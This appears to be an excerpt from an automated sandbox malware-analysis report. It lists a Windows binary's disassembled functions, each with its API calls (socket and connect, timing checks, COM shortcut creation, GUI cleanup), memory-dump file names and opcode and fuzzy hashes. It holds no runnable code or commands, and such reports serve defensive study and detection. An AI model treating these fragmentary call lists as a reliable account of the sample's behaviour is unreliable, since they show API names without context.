                                                                                                                                                    Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 245547762-0
                                                                                                                                                    • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                    • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                                                    • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                    • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                                                    Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                    • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                    • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2338827641-0
                                                                                                                                                    • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                    • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                                                    • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                    • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                                                    Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                                    • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                    • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                                                    • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                    • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                                                    Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                    • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                    • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                                                    • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                    • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                                                    Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4023252218-0
                                                                                                                                                    • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                                    • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                                                    • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                                    • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                                                                    Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1489400265-0
                                                                                                                                                    • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                    • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                                                    • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                    • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                                                    Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1042038666-0
                                                                                                                                                    • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                    • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                                                    • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                    • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                                                    Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd.LIBCMT ref: 0041780F
                                                                                                                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                    • __getptd.LIBCMT ref: 00417826
                                                                                                                                                    • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                                                    • __lock.LIBCMT ref: 00417844
                                                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 938513278-0
                                                                                                                                                    • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                    • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                                                    • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                    • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                                                    Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                    • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4247068974-0
                                                                                                                                                    • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                                    • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                                                                    • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                                    • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                                                                    Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: )$U$\
                                                                                                                                                    • API String ID: 0-3705770531
                                                                                                                                                    • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                                                    • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                                                                    • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                                                    • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                                                                    Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                    • String ID: .lnk
                                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                                    • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                    • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                                                    • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                    • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                                                    Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: \
                                                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                                                    • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                                                    • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                                                                    • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                                                    • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                                                    Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
